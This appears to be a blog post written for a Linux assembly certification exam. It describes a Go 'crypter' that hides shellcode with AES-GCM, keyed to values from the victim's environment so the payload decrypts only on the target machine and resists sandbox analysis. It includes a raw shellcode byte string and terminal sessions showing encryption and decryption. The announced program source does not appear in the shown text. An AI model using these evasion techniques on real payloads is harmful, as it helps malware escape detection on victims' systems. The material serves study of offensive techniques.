SLAE 7: Creating your own crypter using golang
Programming / January 27, 2020 • 4 min read
In this article, we will build a simple crypter for encrypting and decrypting shellcode. I chose to implement the crypter in Go using environmental keys.
I will not spend time implementing a fancy shellcode execution method in this article, only encryption and decryption methods are in scope for now.
The encryption/decryption process is using AES GCM and a specific file in
/etc/ concatenated with the current user logged in as the key. This is called Environmental Keying, meaning you use specific values found in the victim’s environment such as files, hostname or users. The purpose of this is to make sure that your malware only executes in a specific environment. This means the attacker needs to know some details about the environment before encrypting any shellcode.
Analysing the shellcode will be difficult because the correct environment values are needed in order to successfully decrypt the shellcode. Relying on dynamic analysis in a sandbox is futile because of this reason.
The specific values that I have chosen for the key is the file path
/etc/vmware-tools/scripts/vmware/network and current logged in user. The final key will look like this:
The following example encrypts a simple shellcode that executes
dubs3c@slae:~/SLAE/EXAM/github/assignment_7$ go run main.go -e -s "\xfc\xbb\x1b\x91\xcd\xc8\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x2a\x43\x9f\xa0\x22\x4c\x53\x59\xd2\xbd\xbc\xfb\x4b\x4b\x21\xca\x42\x7a\x66\x9d\x5f\xb0\xe6\xde\x5f\x4a\xe7\xde" [+] Your encrypted shellcode: 5af9fb00a2147e12ba73c2686b1b25fac3f441ffcb6974b00ec7413208dc749dae128faf67a5db80fe868dc2386e30546409503beb9ea6973441dc0ace3b35563550e3041fdde2c234b7dbd36ce74f1653ac08ec3be1f6fac3dd6fc34b378477bf6a5acf7800d01ee1c9280d8f6e2ccb8b13f517e790cc6d6623df9b1ced1dc1ebd8df2caca412f6f9d8233bd233fd6c590b12211f0706fc18dca864e97908df4eb638c8b223afc57d59714db119a0075dc935a65a38b4fe175fc15ad2b03125303b98c991ac01238f61c10f444bd85ad081fe2d097f816345e2ab98436cae10033c1cd870502608eac6a3149688b992 dubs3c@slae:~/SLAE/EXAM/github/assignment_7$
The decryption function will loop over all files and folders in
/etc/ and try each file path as the key together with the current username. When the correct key is found, the shellcode is decrypted.
dubs3c@slae:~/SLAE/EXAM/github/assignment_7$ go run main.go -d -s "5af9fb00a2147e12ba73c2686b1b25fac3f441ffcb6974b00ec7413208dc749dae128faf67a5db80fe868dc2386e30546409503beb9ea6973441dc0ace3b35563550e3041fdde2c234b7dbd36ce74f1653ac08ec3be1f6fac3dd6fc34b378477bf6a5acf7800d01ee1c9280d8f6e2ccb8b13f517e790cc6d6623df9b1ced1dc1ebd8df2caca412f6f9d8233bd233fd6c590b12211f0706fc18dca864e97908df4eb638c8b223afc57d59714db119a0075dc935a65a38b4fe175fc15ad2b03125303b98c991ac01238f61c10f444bd85ad081fe2d097f816345e2ab98436cae10033c1cd870502608eac6a3149688b992" [+] Decrypted shellcode: \xfc\xbb\x1b\x91\xcd\xc8\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x2a\x43\x9f\xa0\x22\x4c\x53\x59\xd2\xbd\xbc\xfb\x4b\x4b\x21\xca\x42\x7a\x66\x9d\x5f\xb0\xe6\xde\x5f\x4a\xe7\xde dubs3c@slae:~/SLAE/EXAM/github/assignment_7$
Below is the final program for encrypting/decrypting shellcode.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE-1490